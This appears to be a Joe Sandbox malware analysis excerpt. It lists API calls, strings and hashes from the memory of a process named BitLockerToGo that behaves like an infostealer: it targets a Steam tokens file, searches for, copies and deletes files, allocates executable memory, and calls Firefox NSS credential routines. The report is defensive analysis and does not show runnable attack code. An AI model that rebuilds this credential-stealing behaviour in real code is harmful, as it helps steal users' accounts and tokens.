                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6b86800087ca395ce1eb3c5c9a0a875ae2577bba07b3d1409d6b05fc9559d94a
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 617fe49af4a853afe8f9c7632822a101b952111d14bc4455ea81976d686b79f9
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99C1D632D80129AADF11FBB4EE86ACDB776AF04310F510121EE0477190DE71AF5A8F92
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,02A07B86,?), ref: 02A07ABA
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 544645111-3916222277
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 77774378c9b0534f847178553774d4bd8525b3129e501a0cfec8ce9ba65a55d5
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c8cba6bbf86398fd290540fc725e0a0a92ce16ef8d476230758bdbafba7c059d
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77774378c9b0534f847178553774d4bd8525b3129e501a0cfec8ce9ba65a55d5
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C11667161020AAFDB20CF96EDC4BA9F7F4FB08388F144454A542D62C0EB74BB54DB61
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A18D4D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: CreateThread.KERNEL32(00000000,00000000,02A18B15,?,00000000,00000000), ref: 02A18C85
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A18C8D
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • Soft\Steam\steam_tokens.txt, xrefs: 02A18D5D
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                                                                                                                                                                                                                                                                          • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 502913869-3507145866
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e98ff91e6a8252b7e587147751582d729b064ed1edeb1d2e9b5778657d059fc3
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ae32e49f5b11d91a8496c6edb966f8384984dd025d61e677e79a1b8da5fe1efd
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e98ff91e6a8252b7e587147751582d729b064ed1edeb1d2e9b5778657d059fc3
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1601DE71D801196B9F00FBB5EE869CEBB7AAE00350B504561EE0463155DF31AA598AD1
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Exception@8Throwmalloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3608276449-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c3f80c467f6f68fd325d0379da77ae5848230c75942ce1978e3b8327b98706ce
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 367ad366768a8d4f717eab791a1f3bd7cab1d390578fb5cebb01d2e781f6eb72
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3f80c467f6f68fd325d0379da77ae5848230c75942ce1978e3b8327b98706ce
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5D05E30A40306B7EF106B79ED59489BB2AAA007B87104321BD15E60D4DF70D5928DC5
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A13A59
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 02A180C7
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?), ref: 02A180E5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: wsprintfA.USER32 ref: 02A17D67
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: FindFirstFileA.KERNEL32(?,?), ref: 02A17D7E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: StrCmpCA.SHLWAPI(?,02A37AF4), ref: 02A17D9F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: StrCmpCA.SHLWAPI(?,02A37AF8), ref: 02A17DB9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: wsprintfA.USER32 ref: 02A17DE0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: StrCmpCA.SHLWAPI(?,02A376B6), ref: 02A17DF4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: wsprintfA.USER32 ref: 02A17E11
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: PathMatchSpecA.SHLWAPI(?,?), ref: 02A17E3E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: lstrcat.KERNEL32(?), ref: 02A17E74
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: lstrcat.KERNEL32(?,02A37B10), ref: 02A17E86
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: lstrcat.KERNEL32(?,?), ref: 02A17E99
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: lstrcat.KERNEL32(?,02A37B14), ref: 02A17EAB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: lstrcat.KERNEL32(?,?), ref: 02A17EBF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: wsprintfA.USER32 ref: 02A17E28
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: CopyFileA.KERNEL32(?,?,00000001), ref: 02A17F78
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: DeleteFileA.KERNEL32(?), ref: 02A17FEC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: FindNextFileA.KERNEL32(?,?), ref: 02A1804E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A17D20: FindClose.KERNEL32(?), ref: 02A18062
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2104210347-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2ee6e3a55b72077ec217b3887dc129cff92935e921ed869b781d12a53d60c3bb
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 357e1e00768aad38eb88076a1ffa7215604c340809530add749bdeed54b0ede6
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ee6e3a55b72077ec217b3887dc129cff92935e921ed869b781d12a53d60c3bb
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E231B9B5C8010CAFDF06EB94ED42EE9B7FBFB08314F080895A60953250DE719EA59F51
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,02A07B48,?,?), ref: 02A0777A
                                                                                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 02A077A4
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fe8edca09064c2743cfbed4f5a376899ed3bfa80a85cebc9871a8db5f1bdce19
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5b8d34c89bdb9966dfd874cad52b736621a2ba3e742480cb963c3a36dc88c2a5
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe8edca09064c2743cfbed4f5a376899ed3bfa80a85cebc9871a8db5f1bdce19
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C711A975A40705EBC724CFB8DDC5FAAFBF8AB41758F20492DE61AD6280DB70B940CA10
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 10514dcddf4e63c0444417fcd2d580286199579d6c23016d22a1f3f1132782a7
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 0c3e28c88482ababc4d51c7eab491909ca90b9df8856ac090c1799141822a9bb
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10514dcddf4e63c0444417fcd2d580286199579d6c23016d22a1f3f1132782a7
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D5190F1C50302AFDF217BFE96E8BB2F5E6AF64338B140456A0448A175DF219A40CE65
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8ed8d6aef4f60cd7605bcc1c75d0bec457b69e3204aee39a184c565d054ed928
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e1132b43ac2ab1c0c327dfa0b23eea34f97000f4cfbe7981aa79db80bb7e3bda
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ed8d6aef4f60cd7605bcc1c75d0bec457b69e3204aee39a184c565d054ed928
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4314B71A406149FCF1ADF59EDC09ADFBB2EF84310B24459AD411AB290DF30BA40CED0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A13A59
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1699248803-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f5b8d1ee785cdd62108327b2b0add9dc31fca54b6a50b45abf340f45484882d3
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b37437e66670152551f0311791a4729b41b73f7d411aae782f07e91e44feaf67
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f5b8d1ee785cdd62108327b2b0add9dc31fca54b6a50b45abf340f45484882d3
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CF0DA71E5016DABDB15DF68DD50AAEB7FDEB48310F0045B6B909D3280DA709F458F90
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(?,?,?,02A0EA72,?,?,?), ref: 02A139F5
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 977348715d1f4c07d5dd7739127a4cfa33f896429ebba3763e7acf4b033277cb
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7533a9f5d5401ffcfade892f32b8fa9cf5a4ccbbcb1bb17b18d48507dcb6f68e
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 977348715d1f4c07d5dd7739127a4cfa33f896429ebba3763e7acf4b033277cb
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72D05E355401285B4E101EADEC485ABBE68DB017B47004760FD59960E0DB229C6286C0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SHFileOperation.SHELL32(?), ref: 02A143BD
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: FileOperation
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3080627654-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a992c0af55d60ef184cebaba549c22b6d5d478e218f39fcecb7af2b69a172c9e
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 21e178f6d162df909f31a84aea1d8bb9fca59dd58029e1d043dc9ed8a77fbf88
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a992c0af55d60ef184cebaba549c22b6d5d478e218f39fcecb7af2b69a172c9e
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63E075B0D0421D9ECB41EFA899452EEFAF8BB08308F004569D115F2240E77446498FA5
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 02A10AE9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A10D50: __EH_prolog3_catch.LIBCMT ref: 02A10D57
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A10D50: std::_Xinvalid_argument.LIBCPMT ref: 02A10D7D
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: H_prolog3_catch$Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3139515330-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: daa4b846ac8f22ceea0438809f8e44db27930a3918488e81de055e32ecaa32d8
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6d24312f941a981069f29543ee6c445c6ae0c0431fc8f606c48d038b6284622b
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: daa4b846ac8f22ceea0438809f8e44db27930a3918488e81de055e32ecaa32d8
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5D01732641208EBDF02EFA0C901B8D3B32AF14320F108104BA258F1E0CB329B60EF20
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,02A18680,?), ref: 02A13A93
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: AllocLocal
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3494564517-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f60ea44ca5c8f16690b2d00f66001fb673c95c1c3b21b27aa096b721d3eebf18
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 90135db22308fe714e35b11b9f743153758976d8bf7cee39a66a4bb47d3c5ca0
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f60ea44ca5c8f16690b2d00f66001fb673c95c1c3b21b27aa096b721d3eebf18
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3E02336601B101B8B220E59C644567BB9ACFC197070D4195DE45C73C8CF33C80541D0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 832269c35dc8ac9da3d890c1312c52740132b3f0f7b27d7250719f9059fa2870
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5217273347655f8cea09528ba50bff5f9006ef68b4a8aee77acc01d1faf07398
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 832269c35dc8ac9da3d890c1312c52740132b3f0f7b27d7250719f9059fa2870
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3E0EDB5A10108BFEF40DBA8DD45A9EBBF9EB44354F104065B905E3280EA70EA119A50
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,?,6C68601B,?,00000000,?), ref: 6C6A486F
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,?,?,?,?,00000000), ref: 6C6A48A8
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 6C6A48BE
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgSkipParameter.NSS3(?,?,?,?,?,00000000), ref: 6C6A48DE
                                                                                                                                                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000), ref: 6C6A48F5
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgSkipParameter.NSS3(00000000,?,?,?,?,?,?,00000000), ref: 6C6A490A
                                                                                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(?,?,?,?,?,?,00000000), ref: 6C6A4919
                                                                                                                                                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,00000000), ref: 6C6A493F
                                                                                                                                                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6A4970
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000001), ref: 6C6A49A0
                                                                                                                                                                                                                                                                                                                                                          • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C6A49AD
                                                                                                                                                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6A49D4
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(00000001,?), ref: 6C6A49F4
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgDecodeNumber.NSS3(00000000), ref: 6C6A4A10
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgParseSlotFlags.NSS3(slotFlags,00000000), ref: 6C6A4A27
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgReadLong.NSS3(timeout,00000000,00000000,00000000), ref: 6C6A4A3D
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgGetParamValue.NSS3(askpw,00000000), ref: 6C6A4A4F
                                                                                                                                                                                                                                                                                                                                                          • PL_strcasecmp.NSS3(00000000,every), ref: 6C6A4A6C
                                                                                                                                                                                                                                                                                                                                                          • PL_strcasecmp.NSS3(00000000,timeout), ref: 6C6A4A81
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6A4AAB
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C6A4ABE
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(00000000,hasRootCerts,0000000C), ref: 6C6A4ADC
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6A4B17
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C6A4B33
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6A413D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A4120: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C6A4162
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6A416B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A4120: PL_strncasecmp.NSS3(2Bjl,?,00000001), ref: 6C6A4187
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A4120: NSSUTIL_ArgSkipParameter.NSS3(2Bjl), ref: 6C6A41A0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A4120: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6A41B4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A4120: PL_strncasecmp.NSS3(00000000,0000003D,?), ref: 6C6A41CC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A4120: NSSUTIL_ArgFetchValue.NSS3(2Bjl,?), ref: 6C6A4203
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(00000000,hasRootTrust,0000000C), ref: 6C6A4B53
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6A4B94
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C6A4BA7
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6A4BB7
                                                                                                                                                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6A4BC8
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
